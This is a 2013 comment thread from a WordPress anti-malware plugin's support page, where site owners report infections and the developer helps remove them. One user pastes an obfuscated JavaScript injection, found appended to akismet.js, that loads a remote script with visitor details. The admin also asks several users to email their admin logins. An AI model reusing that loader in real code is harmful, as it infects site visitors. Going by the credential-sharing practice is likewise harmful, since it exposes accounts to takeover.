Members

Donations keep this Plugin alive! If you value this Plugin I urge you to donate as much as can so that I can keep it up-to-date and make it better. The more money I get, the more time I can devote to it, the more you benefit.

Thanks for your support!

You must login to manage your profile!

434 Comments on "Members"

  • On September 23, 2013 at 4:21 pm, Greg Roth said:

    I installed your great plugin previously and it was working great. I updated WordPress and now your plug in is not showing up on my dashboard. Also, I tried installing and it says that it the plugin already exists but I am not finding it. Can you please assist?

    Reply
    • On September 23, 2013 at 5:02 pm, Anti-Malware Admin said:

      Does it show on the list of installed plugins? Is it the newest version? When you tried installing it and got the “already exists” error, what was the exact message you got?

      If you want me to look at it for you please send me your WP Admin login.

      Reply
  • On September 9, 2013 at 1:14 pm, O H said:

    I just installed your plug in but it didn’t find any known threats but I do have a real compromised problem here. When I type in my website http://www.octaviaharris.com on sites like facebook or https://bitly.com/ the description and page text display weird text like this:

    Isr med assoc j androl mccullough levine return of Levitra Viagra Vs Levitra Viagra Vs symptomatology from a nexus between the serum. Criteria service connection on erectile dysfunctionmen who have Price Of Cialis Price Of Cialis revolutionized the users of ejaculation? They remain the chronicity of diverse medical Cialis Cialis and minor pill communications.

    It just started happening yesterday. Can your plug in help resolve my issue?

    Thanks

    Reply
    • On September 9, 2013 at 1:43 pm, Anti-Malware Admin said:

      It should be able to find this threat. If you have downloaded the latest definition update and it still does not find any known threats on a Complete Scan then you can send me your WP Admin login and I will find it for you and add it to my definition update so that it can be automatically detected and removed.

      Reply
  • On August 26, 2013 at 5:50 am, John Vargas said:

    Hello,

    My WP site was compromised. I went ahead removed php files via FTP that the plugin found. Would you please check things out to be make sure sure that all is well now.

    Thanking you in advance!

    Reply
    • On August 26, 2013 at 9:01 am, Anti-Malware Admin said:

      It looks alright from the outside. What was the file that you deleted?

      If you have any reason to think you might still be infected and you want me to check it out from the inside I’ll need your WP Admin login.

      Reply
  • On August 21, 2013 at 8:27 am, Michigan Lupus said:

    Hello,

    I am having recurring issues with backdoor scripts? Can you please help me resolve this issue?

    Reply
    • On August 21, 2013 at 8:40 am, Anti-Malware Admin said:

      Send me your WP Admin login and I’ll take a look. You can email the info directly to me: eli AT gotmls DOT net

      Reply
  • On August 18, 2013 at 1:56 am, Numair Imran said:

    Thanks for this AMAZING plugin
    I have tried everything to reface my website
    crescentcarco.com
    replaced every file, except the uploads folder *checked it manually*
    now my subpages work fine but my main page still redirects.
    can you PLEASE take a look at it, I will be obliged

    Reply
    • On August 18, 2013 at 7:57 pm, Anti-Malware Admin said:

      Thanks for sending me access credentials to your site and your server.

      Got the home page fixed!

      It turns out there was a text widget that was injected into your database. I’m not sure how the hacker did that, probably a database vulnerability at the hosting level, but it was easy to remove.

      Please let me know if there is anything else I can do for you.

      Reply
      • On August 18, 2013 at 8:03 pm, Numair Imran said:

        Dude you seriously ROCK

        i also saw the entry of the text widget in the database, it looked suspicious and made no sense at all, but i was afraid to mess up the DB.

        Once again thanks man, I really appreciate your help

        Any advise on securing my site permanently, it gets defaced often.

        Thanks
        Numair

        Reply
        • On August 19, 2013 at 7:39 am, Anti-Malware Admin said:

          Thanks.

          Protecting your site from future hacks is difficult because there are just so many ways that hacker will try to get in. In your case, because of the way the DB was hacked I would suggest moving to a more secure hosting environment. Cheap shared hosting is just so vulnerable to cross-site contamination, control panel breaches, and root server hacks.

          I now offer very secure hosting for those that are getting too much attention from hackers and need a safer place to host their site. It’s $12/month per site and there is no control panel. Let me know if you are interested.

          Reply
  • On August 7, 2013 at 7:00 am, Nma said:

    Eli,

    Thank you for the wonderful work you’re doing and for this great plugin.

    Three of my WP sites were hacked last week and the hacker’s page and music (from Philipines) were inserted on my homepage. After a couple of days, Hostgator fixed it for me and warn me to always updates my plugins and themes.

    Today, the same hacker did his thing again, only it has affected more of my sites.

    Thus, I downloaded your plugin and after scanning one site, it identified 4 potential viruses. Below is one of them.

    Do you think this is the virus. I can give you admin access if that will help.

    Thanks!

    cap->create_posts ) )
    wp_die( __( ‘Cheatin’ uh?’ ) );

    /**
    * Press It form handler.

    Reply
    • On August 7, 2013 at 10:08 am, Anti-Malware Admin said:

      Thanks for sending me your WP Admin login credential. I downloaded my definition updates and ran a Complete Scan on your site. Those potential threats are all ok. It looks like your site was defaced by a hacker using a vulnerability of your server or another compromised site on your shared host. There may be nothing you can do to stop an attack like this other than moving all your sites of that server.

      The good news is that the damage is minimal and very easy to fix. The hacker has planted a file called index.html in the root directory of each infected site. WordPress uses a file called index.php so index.html is not needed and should be deleted. You can use your host’s file manager or any FTP client to delete these infected index.html files easily. I have also updated the scan range of my plugin on your server to scan the whole public_html directory and all the sites in it. If all else fails you can use me plugin to find and delete these infected files, it will take a really long time to run a Complete Scan on all those site but the option is now there if you need it.

      Let me know if you need any more help.

      Aloha, Eli

      Reply
  • On July 17, 2013 at 11:48 pm, Limp Salas said:

    I’ve got some malicious virus on the website and ran your plugin which found 18 potential threats. A lot of index.php in different folders that just have one single script in each file (?). But i really dont know how to do now. How do I get rid of this malicious virus? Can you please go into the website and fix this? Would of course make a donation if the virus gets away.
    Thanks,
    Limp

    Reply
    • On July 18, 2013 at 8:34 am, Anti-Malware Admin said:

      Can you please email me with the WP Admin login for your site?

      My direct email is: eli at gotmls dot net

      Reply
    • On March 11, 2014 at 1:59 pm, Hay Wilson said:

      hi i have the same issue please help

      Reply
      • On March 11, 2014 at 10:44 pm, Anti-Malware Admin said:

        Have you registered my plugin and downloaded the latest definition updates?

        If you have done this and my plugin still does not find any known threats then this could be a new type of infection that needs to be added to my definition update. As I told Limp Salas, if you send me your WP Admin login I will find it for you and add it to my definitions so that it can be automatically removed.

        Reply
  • On July 5, 2013 at 6:42 pm, Nikhil Mahajan said:

    Hi

    First of i must say awesome plugin but thing is that i am facing daily wordpress post attack like
    and something suspecious

    these kind of attack .

    Do you have any plugin that solves these kind of issue on posts ??

    Thanks

    Reply
    • On July 5, 2013 at 8:13 pm, Anti-Malware Admin said:

      It sounds like this could be an SQL injection. You should try changing the login credentials to your DB. If the attacks continue at regular intervals check the log files at the time of the attack to see if you can spot the script file responsible for the injection.

      Reply
  • On July 2, 2013 at 8:41 am, WAYNE STOCKS said:

    Something has infected all of my plugins on different sites. I am trying to run your plugin (which I resintalled) and I am getting the message

    “Another Plugin or Theme is using ‘eva1fY2bak1cV2ir’ to hadle output buffers.
    This prevents actively outputing the buffer on-the-fly and will severely degrade the performance of this (and many other) Plugins.
    Consider disabling caching and compression plugins (at least during the scanning process).”

    I don’t have any plugins running (as a result of the virus), so I can’t figure out how to fix the issue with the output buffers. Any ideas? Right now it has checked 25 folders in 18 minutes with 4,407 folders left to go.

    Reply
    • On July 2, 2013 at 8:53 am, Anti-Malware Admin said:

      eva1fY2bak1cV2ir sound like a malicious function that was hacked into your site to inject redirects or ads into the output of your pages. It is probably embedded in your theme or one one of the core WordPress files. It may also be encoded so that you cannot easily search for it or tell what it’s doing with your output.

      It’s obviously affecting the speed of you site if it’s taking that long to scan. If my plugin does not find it when the scan finally finishes then you can send me your WP Admin login and I’ll look for it for you.

      Reply
  • On June 18, 2013 at 9:32 am, tc0nn said:

    You misspelled “handle”:

    Another Plugin or Theme is using ‘eva1fY2bak1cV2ir’ to hadle output buffers.

    Reply
    • On June 18, 2013 at 9:56 am, Anti-Malware Admin said:

      Thanks for pointing that out. That message has been misspelled this whole time and I didn’t notice and nobody else has said anything until now. I’ll have it corrected in my next release.

      Reply
  • On June 17, 2013 at 5:45 am, Roger Hawk said:

    Hey Eli,

    I noticed that all my sites I have your plugin installed on got a message alert that the wp-content/plugins/gotmls/safe-load.php file was changed. Did you do this or are the hackers trying to defeat your plugin?

    Thanks…

    Reply
    • On June 17, 2013 at 7:43 am, Anti-Malware Admin said:

      That was me. I did upload a change to that file but did not release a new version so it shows up different.

      Reply
  • On June 15, 2013 at 4:32 pm, Christopher Wilkinson said:

    Hello Eli

    I am learning how to be a web master and have had to deal with these malware problems more and more lately. I love your anti malware program. Can I get you to look at our site and help me make sure there are no problems. This is a school website and I need to make sure the community can access this website safely.

    my site http://www.cic-caracas.org is infected by malware. i have scanned using this plugin and confirmed and said it took care of some of the treats but listed 68 potential threats. What can I do about all of those. Please tell me how to remove all those or if it is necessary.

    Thanks.

    Reply
    • On June 15, 2013 at 7:59 pm, Anti-Malware Admin said:

      I would be happy to check your site for you. Can you send me you WP Admin login?

      You can email the password info directly to: eli at gotmls dot net

      Reply
    • On June 18, 2013 at 1:21 pm, Anti-Malware Admin said:

      Thanks for sending me the login. I did find one more threat in the footer, added it to the definition update, and removed the malicious code from that file.

      Your site should be all clean now. You just need to go to your Google Webmaster Tools account and request a review in the Malware section to get rid of that warning from Google.

      Please let me know if you need anything else.

      Reply
  • On June 10, 2013 at 3:10 am, Stein Brauten said:

    Hi Eli,

    Thank you for this great plugin! It fixed a lot of crap having entered my site, but yeasterday I got a new one. All plugins disapeared, but still in the plugin directory. I removed everything to try to re-install, had a hunch so started with Anti-Malware to run a scan and it reported:
    “Another Plugin or Theme is using ‘eva1fY2bak1cV2ir’ to hadle output buffers.
    This prevents actively outputing the buffer on-the-fly and will severely degrade the performance of this (and many other) Plugins.
    Consider disabling caching and compression plugins (at least during the scanning process).
    What is this “eva1fY2bak1cV2ir” – and how to get rid of it??

    Br,

    Stein

    Reply
    • On June 10, 2013 at 6:53 am, Anti-Malware Admin said:

      eva1fY2bak1cV2ir is a custom function that has taken over the output buffer on your site. I cannot say exactly what it does without seeing it, but I would guess it is filtering the content of you site to display only what the hacker wants to display (or it inserts content that the hacker wants to add to your site).

      If you want to give me access to your site I will see if I can find it for you.

      Reply
  • On May 15, 2013 at 9:52 am, Vicki said:

    Thanks so much for the great plugin. I have an issue with some Malware on our site. Sucuri says it found Malware, but your plugin and Wordfence both say the site it clean. However, both computers I accessed the site with ended up getting infected with the “system-care antivirus” malware, so I suspect this is what Sucuri is picking up. I am not sure what my next step should be or where to look in my files for suspicious code. Any suggestions would be greatly appreciated.

    Thanks again,
    Vicki

    Reply
    • On May 15, 2013 at 10:25 am, Anti-Malware Admin said:

      If you have my latest definition update and you are scanning your whole site and it’s not finding anything then you may have a new virus that I have not yet identified. These threats are alway evolving and adapting to avoid detection. Would you be willing to provide me with WP Admin access to your site? Then I can find it and update my definitions update so that it can be automatically repaired by my plugin.

      Reply
  • On May 4, 2013 at 1:12 am, Damir Kropf said:

    Error message disappeared … seems that everything is OK afterall. Thanks!

    Damir

    Reply
    • On May 4, 2013 at 6:05 am, Anti-Malware Admin said:

      Sometimes it take a little while for Google to review your site and notice that it has been cleaned. For future reference, you can speed that process up by requesting a review in the Health section of Google’s Webmaster Tools.

      Reply
  • On April 26, 2013 at 2:41 pm, location voiture agadir said:

    The plugin detect a normal code and say : Found 1 WP-Login Exploit

    <?php
    /**
    * WordPress User Page
    *
    * Handles authentication, registering, resetting passwords, forgot password,
    * and other user handling.
    *
    * @package WordPress
    */

    /** Make sure that the WordPress bootstrap has run before continuing. */
    require( dirname(__FILE__) . '/wp-load.php' );

    ———

    is that a bug?
    thanks

    Reply
    • On April 26, 2013 at 3:33 pm, Anti-Malware Admin said:

      Thanks for asking this question. No, it is not a but?

      It is, as you say, normal code.
      It is the essentially the first line of code in every wp-login.php in every install of WordPress.
      It is also extremely vulnerable to a brute-force attack.

      Basically, if that wp-load.php file is included without certain protection, it can bring down your whole server. My plugin now has a patch for this file that stops the WordPress bootstrap from loading if it senses a brute-force attack. This was inspired by the wide-spread brute-force attacks that have been targeting WordPress login pages around the world for the past few weeks. These attacks have crippled servers and probably succeeded in stealing some passwords too. So my plugin looks for the absence of my patch and , if not found, classifies this file as Exploitable. Select this file to be fixed will automatically apply my patch, in much the same way as it patches older versions of timthumb.php that can be exploited to write malicious code to files on your server.

      I hope this suitably explains why it is highlighting this “normal” part of any WordPress installation. Please feel free to contact me again, should you need any further explanation or assistance.

      Reply
      • On April 28, 2013 at 5:32 am, Roger Hawk said:

        That explains why I thought this was coming up with a false positive. I see where some people were having issues logging back in after applying the fix. Is that fixed now? I don’t want to apply the patch and then not be able to log back in.

        Also, I have a couple of files that are written with an eval Base_64 statement in them. I sent the potential virus file to the creator of the plugin and asked if the code (machine code I couldn’t decode) was legitimate. They said it was legit.

        My question is how do we mark a file as not a virus after using your plugin?

        Thanks again Eli for everything.

        Reply
        • On April 28, 2013 at 6:56 am, Anti-Malware Admin said:

          There were a few people who had a problem logging in after applying the first version of this login patch. This was because there servers had register_globals turned on and WordPress destroys session vars whenever register_globals is on. I have fixed this in the current patch and it works great at stopping these brute-force attacks.

          If you have any false positives that come up because a plugin developer is trying to be sneaky or cryptic like a hacker then I can whitelist that code but only after I decrypt it and check it thoroughly to make sure it is really ok.

          Reply
        • On April 28, 2013 at 7:29 am, Roger Hawk said:

          Great job Eli. The login script cleanse works great. Tried it on a test domain and no problems at all.

          Thanks so much.

          I’ll get you the info on those false positives. I do have a couple of coders who like to hide what they did so most people don’t steal their ideas and processes.

          Roger

          Reply
  • On April 20, 2013 at 5:46 am, Jeff Dorman said:

    Hi Eli. I love your plug-in! But I just upgraded to 1.3.04.17 and even though the site is registered I am getting an error message on ‘What to look for’:

    WP-Login Exploits
    Registration of your Installation Key is required for this feature

    but your Scan Setting Page also tells me:

    Your Installation Key is Registered:
    8d8f06a5f8d73d9a59ad6f993de2fac1
    http://308gts.dorman-consulting.com
    Your Definitions file is current.

    Is this normal?

    Jeff

    Reply
    • On April 20, 2013 at 6:45 am, Anti-Malware Admin said:

      I’m sorry you got conflicting information on that page. I had to disable that particular update because it was causing problems on some peoples sites. I have just released a plugin update that reolves this issue. If you download the new version 1.3.04.19 then it should work correctly.

      Please let me know if you still have any issues, Thanks.

      Reply
  • On April 19, 2013 at 10:58 am, Ron Quick said:

    Hello Eli, Just downloaded and ran your plug-in. It did find some malware and repaired on my site. Problem Is I still have an issue with my site Google is calling malware and has posted a warning. I would like to give you more info if you could look

    Thanks

    Reply
    • On April 19, 2013 at 11:14 am, Anti-Malware Admin said:

      This is a common problem for people, after removing the malware you need to have Google review your site. There is a Malware page in the Health section of Google Webmaster tools where you can request a review.

      let me know if you need any more help.

      Reply
  • On April 16, 2013 at 10:35 am, Stephanie said:

    Hello,

    Malware has completely messed up the appearance of my blog. I don’t have a current backup so I’m trying desperately to restore my site without completely wiping it. I’ve run several scans from various sources and they all show different results. I’ve heard good things about your plugin so I’d love to use it but it shows no threats (but skipped about 1100 files). Am I out of luck or am I doing something wrong?

    Reply
    • On April 16, 2013 at 11:33 am, Anti-Malware Admin said:

      Your not out of luck because you just contacted the right person. You probably just have some new malware variant that I have not written a definition for yet. If you send me your WP Admin login I will get in there and find it for you, and add it to my definition update so that it can be automatically repaired.

      Reply
    • On April 19, 2013 at 12:47 pm, Anti-Malware Admin said:

      Thanks for sending me your login info, and for the tip about the analytics plugin. I found the Malicious code embeded in the main plugin file of the Google-Analyticator Plugin. I have added this new threat to my definitions update and repaired that files with my plugin. You can enable that Google-Analyticator Plugin again if you want to still use it.

      Reply
  • On April 15, 2013 at 12:48 pm, Jeff said:

    I just stopped by to make my monthly donation.

    Eli, keep up the good work, you’re a godsend.

    Mahalo

    Jeff

    Reply
  • On April 10, 2013 at 12:50 am, Saskia Salomons said:

    Hi Eli,

    Great plugin.
    Can you please help me out? My site is infected with malware.
    I have a Malware entry: MW:EXPLOITKIT:BLACKHOLE1. Can your plugin fix this entry?

    I already scanned and 5 threads where found. However, http://sitecheck.sucuri.net/results/vonkatwork.nl still shows that my site is infected.
    Thanks!

    Reply
    • On April 10, 2013 at 1:38 pm, Anti-Malware Admin said:

      Sucuri shows you are clean now.

      If you still need more help with anything send me your WP Admin login.

      Reply
  • On April 1, 2013 at 8:33 am, Baldemar said:

    I got the same problem I installed the plug in and runed the scan but nothing has changed, I am still have the same problem. Here is what my antivirus warnig is telling me:
    URL:

    http://movinghouston.com/wp/buy_sell/

    Process:

    C:Program Files (x86)GoogleChromeApp…

    Infection:

    JS:Iframe-AMW [Trj]

    Reply
    • On April 1, 2013 at 11:09 am, Anti-Malware Admin said:

      Thanks for providing a login to your admin. I added that new threat to my definitions update and then my plugin was able to remove it form the two files that were infected.

      I also expaneded the search range to include the root site and it found and clean two backdoor scripts that were probably responible for planting the virus in the first place.

      You site is all clean now. Let me know if there is anything else you need.

      Reply
  • On March 31, 2013 at 4:52 pm, michael denigan said:

    Hi
    I have a site bluemonkeyonline.net that is infected with malware which appears to come from bizwonk.com, as every time I load bluemonkeyonline.net, bizwonk.com appears in the lower left of the browser window. I have scanned and infected files have been located and quarantined and a number of potential threats have been found, but the site is still infected as on reload the domain bizwonk still apears. Am I doing something wrong.
    Cheers….michael

    Reply
    • On March 31, 2013 at 5:38 pm, Anti-Malware Admin said:

      It sounds like you have an iframe injection that is not being detected by me plugin. If you want to give me WP Admin accesss to you site I can find it and add it to my definitions so it can be automatically removed.

      Reply
  • On March 25, 2013 at 12:25 am, Eva Brumark said:

    Hi Eli!

    I really need help… I’m one of several administrators for this site: http://www.bryggerietsgymnasium.se. It’s been blacklisted for a week so I decided to spend my weekend trying to solve the problems. Without success. I have installed Anti-Malware and another malware plugin and done a check with Sucuri, and I get different results everywhere. Sucuri results are that it doesn’t show any problems but still have been blacklisted by Yandex. I have updated wordpress and all plugins. Anti-Malware results refer mostly to script files (23), both in wordpress and plugins (among them the other malware plugin!). I have been able to half the problems by removing a lot of old posts but it’s more tricky when it comes to pages. The other malware plugin finds problems everywhere…. Now I’m a bit desperate. Can you please help?

    Thank you//Eva

    Reply
  • On March 23, 2013 at 7:15 am, Thomas Haarr said:

    I have trouble that Avast software find malware and block my site. I’ve tried almost 10 different check up software and sites that do that to find something. but doesn’t find anything. Is Avast just being stupid with my site or?

    Reply
    • On March 23, 2013 at 8:45 am, Anti-Malware Admin said:

      This is the second comment within a half hour that reports of such a problem with Avast!

      I do not see any signs of infection on either site. So, this is either a very new/undetected virus that Avast has found, or something on both sites is giving off false positives to Avast.

      If there is something new that has infected your site then it is certainly possible that my plugin (as well as others’) has in fact missed it.

      If you can come up with any details about this infection that might help me identify it I would be happy to take a closer look.

      Reply
  • On March 23, 2013 at 6:46 am, Jesper said:

    Hi, a visitor of my site discovered that his Avast! flagged it as containing malware. This plugin doesnt recognize any threats when I scanned through the files. Should I not worry or might there be something that this plugin cannot find?

    Reply
    • On March 23, 2013 at 8:37 am, Anti-Malware Admin said:

      Your’s is one of two comments within a half hour of each other that highlight such a report about Avast!

      I do not see any signs of infection on either site. So, this is either a very new/undetected virus that Avast has found, or something on both sites is giving off false positives to Avast.

      If there is something new that has infected your site then it is certainly possible that my plugin (as well as others’) has in fact missed it.

      If you can come up with any details about this infection that might help me identify it I would be happy to take a closer look.

      Reply
  • On March 15, 2013 at 1:06 pm, Roger Hawk said:

    I just registered the first domain and wanted to run a scan to see if it does as advertised. if it does, I too want to be able to protect all my domains under two email addresses. I have one for my personal use and one that is a reseller account I put my clients sites in.

    Cheers,

    Reply
    • On March 15, 2013 at 1:15 pm, Anti-Malware Admin said:

      That sounds like a good plan. Do you have any infected site you are trying to get clean?

      Let me know if I can be of any assistance.

      Reply
  • On March 6, 2013 at 10:03 pm, Richard Lucas said:

    So far I have used the scanner on three of my sites. Each time they found 2 known threats. When I clicked auto fix, it would fix one of the files, but not the other. What should I do next. Can I actually delete that file from the directory or no? Thanks for your help.

    Reply
    • On March 7, 2013 at 8:06 am, Anti-Malware Admin said:

      I would not delete the file unless you are sure it is not needed for your site to function. Usually these types of infections are just one line of malicious code that is injected into a core file that your site was already using and deleting that file will break your site. The trick is to remove the malicious code while preserving the integrity of the rest of the file. That said, there are sometime files that are all bad and no good and not needed at all which you can delete but knowing the difference if the key. If my plugin cannot remove that second threat then it is probably due to the permissions on that file.

      If you want I can take a look at and fix it for you and give you more info. You can send login credentials directly to my email if you want me to check it out: eli at gotmls dot net

      Reply
  • On March 5, 2013 at 1:15 pm, Marketing Admin said:

    I was pretty psyched to discover your plug-in, installed it, started to run it when it appeared to get hung up. I logged out and now I have this error:

    Fatal error: Unknown: Failed opening required ‘/data/26/2/24/8/2513008/user/2752766/cgi-bin/.php/sessions/sess_d46e1d1d9b1761f304069089014695a6′ (include_path=’.:/usr/services/vux/lib/php’) in Unknown on line 0

    I am very sad.

    Reply
    • On March 12, 2013 at 5:40 am, Anti-Malware Admin said:

      I just wanted to follow up from last week, and say thank for providing the WP Admin and FTP logins I needed to get you issue resolved.

      How has your site running? It looks like it has stayed clean but I see it is still blacklisted on Google. You need to go to Google’s Webmaster tools and request a review to clear that warning. Let me know if you need help with that.

      Also, it looks like there are still vulnerable timthumb.php files in the themes of two other sites on your server. These are not viruses but they are still exploitable and could lead to another infection. My plugin can scan all the sites on your server at once and automatically upgrade those timthumb files to patch that vulnerability.

      Please let me know if can be of any further assistance.

      Reply
  • On February 14, 2013 at 1:43 pm, Todd Kevitch said:

    Great product – just made a donation. Do you have any simple suggestions for new WordPress blogs to prevent malware, etc. I read somewhere to change categories and to make difficult passwords but I couldn’t find the article again.

    Reply
    • On February 14, 2013 at 4:39 pm, Anti-Malware Admin said:

      There is no golden solution to this general problem, but usually keeping WordPress up-to-date and making sure the theme and plugins you are using do not have any known vulnerabilities is a good start. It is also a good idea to run regular scans for mal-ware. I am working on a cron engine for scheduling automatic scan which will help with that.
      I have never hear anything about changing categories but it couldn’t hurt to have strong passwords (but these kinds of hacks usually don’t need to use your password to get in).

      Thanks for your donation. The more support I get, the more I can support this plugin and make it better and stronger against a wider variety of threats and vulnerabilities.

      Reply
  • On February 12, 2013 at 1:07 am, Asfihani Asfik said:

    Hi Eli,

    Awesome plugin and keep the good work. Anyway, any chance to prevent the logo displayed in the menu links, I mean just like another plugins :) . Thanks again.

    Reply
    • On February 12, 2013 at 7:18 am, Anti-Malware Admin said:

      I think you are asking if it is possible to not show the Anti-Malware menu item.
      If so you may want to look on the bottom-right of the Scan Settings page and change the “Menu Item Placement Options” setting to “Sub-Menu inside the Tools Menu Item”.
      If that is not what you are looking for then please try me again and I’ll see what I can do to help.

      Reply
  • On February 8, 2013 at 2:02 am, sunny tewathia said:

    I will definitely look forward to donation, if you really helped me out. As i wasted my money into SiteLock service, i have requested the refund after getting it i will donate the same amount to you…
    Please help me ASAP.

    Reply
    • On February 8, 2013 at 7:13 am, Anti-Malware Admin said:

      I can help you now but I will need you WP Admin login to scan for this threat. When I find it I will add it to the definition update and it can then be removed automatially. Please send login credentials to eli at gotmls dot net or reply to this notification.

      Reply
  • On February 1, 2013 at 2:35 pm, Christopher Shaw said:

    Hello, I just downloaded your plugin and my website mobile version seems to be redirecting to a russian model website. Can your plug in fix this malware problem? We are more then happy to donate if it can.

    Reply
    • On February 1, 2013 at 2:42 pm, Anti-Malware Admin said:

      It should find it and mark it as a Known Threat at which point you can click Automatically Repair to fix it.

      If it does not find it, or it only find Potential Threats, then I can help you locate the source of the infection and write a new definition so that it can be automatically removed.

      Please let me know if you need further help. You email your WP Admin credentials to eli at gotmls dot net if you want my direct help.

      Reply
  • On January 30, 2013 at 6:46 am, Lee Boone said:

    Is it possible to register more than one site, or do I need to create a different user profile for each site I’d like to scan?

    Reply
    • On January 30, 2013 at 7:08 am, Anti-Malware Admin said:

      If you use the same email address when registering the other sites then they will all fall under the same registration. If you have already registered some under other email addresses you can login to those accounts and transfer those domains you have already registered to your preferred email account.

      Reply
  • On January 22, 2013 at 8:31 am, Jan De Joya said:

    Hi Eli,

    I ran a scan with your plugin, it found 2 security vulnerabilities in htaccess. Clicked repair, and then got 500 internal server error… now my site is down, can you help?

    Reply
    • On January 23, 2013 at 8:28 am, Anti-Malware Admin said:

      It looks like sucuri already removed some injected code from those htaccess files. My plugin had found some remaining code left in pieces in those files and when it tried to remove the last few pieces of code it broke the file. This would not have happened if my plugin had scanned these htaccess files before sucuri modified them (when the whole malicious redirect code was intact) or if sucuri had removed all the injected code when they cleaned the file, but at least we know how it happened and I can try to accommodate this sort of thing in the future.

      Thanks for giving me the chance to look at it all on your server. Please feel free to contact me if you need more help.

      Reply
  • On January 20, 2013 at 6:58 pm, Craig Lambie said:

    Hey Eli,
    Great plugin, I am impressed so far at it finding some malicious scripts, but it reports this one as a potential threat, when I am pretty sure it is a threat :)
    Basically everything from “var _0x4470=” onwards has been appended by a hacker/ malicious script.

    Thanks

    [script akismet.js]
    jQuery(document).ready(function () {
    jQuery(‘.akismet-status’).each(function () {
    var thisId = jQuery(this).attr(‘commentid’);
    jQuery(this).prependTo(‘#comment-’ + thisId + ‘ .column-comment div:first-child’);
    });
    jQuery(‘.akismet-user-comment-count’).each(function () {
    var thisId = jQuery(this).attr(‘commentid’);
    jQuery(this).insertAfter(‘#comment-’ + thisId + ‘ .author strong:first’).show();
    });
    });

    var _0x4470=["x39x3Dx31x2Ex64x28x27x35x27x29x3Bx62x28x21x39x29x7Bx38x3Dx31x2Ex6Ax3Bx34x3Dx36x28x31x2Ex69x29x3Bx37x3Dx36x28x67x2Ex6Bx29x3Bx61x20x32x3Dx31x2Ex65x28x27x63x27x29x3Bx32x2Ex66x3Dx27x35x27x3Bx32x2Ex68x3Dx27x77x3Ax2Fx2Fx74x2Ex75x2Ex6Cx2Ex76x2Fx73x2Ex72x3Fx71x3Dx27x2Bx34x2Bx27x26x6Dx3Dx27x2Bx38x2Bx27x26x6Ex3Dx27x2Bx37x3Bx61x20x33x3Dx31x2Ex6Fx28x27x33x27x29x5Bx30x5Dx3Bx33x2Ex70x28x32x29x7D","x7C","x73x70x6Cx69x74","x7Cx64x6Fx63x75x6Dx65x6Ex74x7Cx6Ax73x7Cx68x65x61x64x7Cx68x67x68x6Ax68x6Ax68x6Ax67x7Cx64x67x6Cx6Cx68x67x75x6Bx7Cx65x73x63x61x70x65x7Cx75x67x6Bx6Bx6Ax6Bx6Ax7Cx68x67x68x6Ax67x68x6Ax68x6Ax67x6Ax68x7Cx65x6Cx65x6Dx65x6Ex74x7Cx76x61x72x7Cx69x66x7Cx73x63x72x69x70x74x7Cx67x65x74x45x6Cx65x6Dx65x6Ex74x42x79x49x64x7Cx63x72x65x61x74x65x45x6Cx65x6Dx65x6Ex74x7Cx69x64x7Cx6Ex61x76x69x67x61x74x6Fx72x7Cx73x72x63x7Cx72x65x66x65x72x72x65x72x7Cx6Cx6Fx63x61x74x69x6Fx6Ex7Cx75x73x65x72x41x67x65x6Ex74x7Cx32x31x36x7Cx6Cx63x7Cx75x61x7Cx67x65x74x45x6Cx65x6Dx65x6Ex74x73x42x79x54x61x67x4Ex61x6Dx65x7Cx61x70x70x65x6Ex64x43x68x69x6Cx64x7Cx72x65x66x7Cx70x68x70x7Cx7Cx39x31x7Cx31x39x36x7Cx36x34x7Cx68x74x74x70","x72x65x70x6Cx61x63x65","","x5Cx77x2B","x5Cx62","x67"];eval(function (_0xa064x1,_0xa064x2,_0xa064x3,_0xa064x4,_0xa064x5,_0xa064x6){_0xa064x5=function (_0xa064x3){return _0xa064x3.toString(36);} ;if(!_0x4470[5][_0x4470[4]](/^/,String)){while(_0xa064x3–){_0xa064x6[_0xa064x3.toString(_0xa064x2)]=_0xa064x4[_0xa064x3]||_0xa064x3.toString(_0xa064x2);} ;_0xa064x4=[function (_0xa064x5){return _0xa064x6[_0xa064x5];} ];_0xa064x5=function (){return _0x4470[6];} ;_0xa064x3=1;} ;while(_0xa064x3–){if(_0xa064x4[_0xa064x3]){_0xa064x1=_0xa064x1[_0x4470[4]]( new RegExp(_0x4470[7]+_0xa064x5(_0xa064x3)+_0x4470[7],_0x4470[8]),_0xa064x4[_0xa064x3]);} ;} ;return _0xa064x1;} (_0x4470[0],33,33,_0x4470[3][_0x4470[2]](_0x4470[1]),0,{}));

    Reply
    • On January 20, 2013 at 8:21 pm, Anti-Malware Admin said:

      Thanks for reporting this. I does indeed look malicious. I will define it now and add it as a Known Threat so that it may be automatically repaired.

      Reply
    • On January 20, 2013 at 10:03 pm, Eli Scheetz said:

      I just updated the definitions. Can you do the download the update and scan it again? It should now mark this threat as “Known” and give you the option to “Automatically Repair”.

      Please let me know how it works for you. Thanks!

      Reply
      • On January 23, 2013 at 6:21 pm, Craig Lambie said:

        Hey Eli,
        Thanks for the reply, and diligently adding to the definitions.
        I have removed these manually, so haven’t been able to successfully get them to be removed with the scanner yet, but hopefully I will soon… well hopefully not actually, but you know what I mean.
        I was thinking it would be good to be able to submit potential threat files to the definition too, so that jw player for example (a common plugin) isn’t caught everytime as it has an eval() in it…. that is apparently legit…?
        I would be happy to submit my scripts to you from plugins… or just the links to plugins with eval() in their scripts, and you could then get the original for your definition and compare?
        Thanks again.
        C

        Reply
        • On January 25, 2013 at 12:12 am, Anti-Malware Admin said:

          Thanks. I understand. I have not had the time I need to go through and exempt all the legit uses of eval and the like. I do have a method for white-listing benign code that would otherwise come up as a potential threat but it will take some time for me to go through and list all the exceptions properly without allowing loopholes for the malicious code.

          Reply
  • On January 6, 2013 at 6:44 am, Brian Roberts said:

    I’ve registered and donated to your site but can no longer login to my wordpress admin page.

    When I tried to update the definitions from the wordpress plugin section nothing happened (the rest of the registration section was in green).

    Can you help please?

    Reply
    • On January 6, 2013 at 7:38 am, Anti-Malware Admin said:

      I would be happy to help. If you want to give me your WP Admin credentials I can login and try it.

      Reply
  • On January 3, 2013 at 12:42 am, Heru Prasetyono said:

    I am sorry I havenot made any donation yet. I just started trying the service you give. I have a problem that I can not solve yet. There is “Found the document has moved here” note on the top left corner of my blog page. I think this is a malware or a kind of virus. I try to scan all the plugins, wp content and html but this software plugin seems does not workl
    Please help me this malware is very disturbing and dangerous for my web blog and my computer.
    I am looking forward to your support and help. Please…

    Best regards

    Reply
    • On January 4, 2013 at 9:12 am, Anti-Malware Admin said:

      I’m willing to help you find this bug if you can give me your WP Admin credentials.

      Reply
      • On January 11, 2013 at 7:02 am, Myles said:

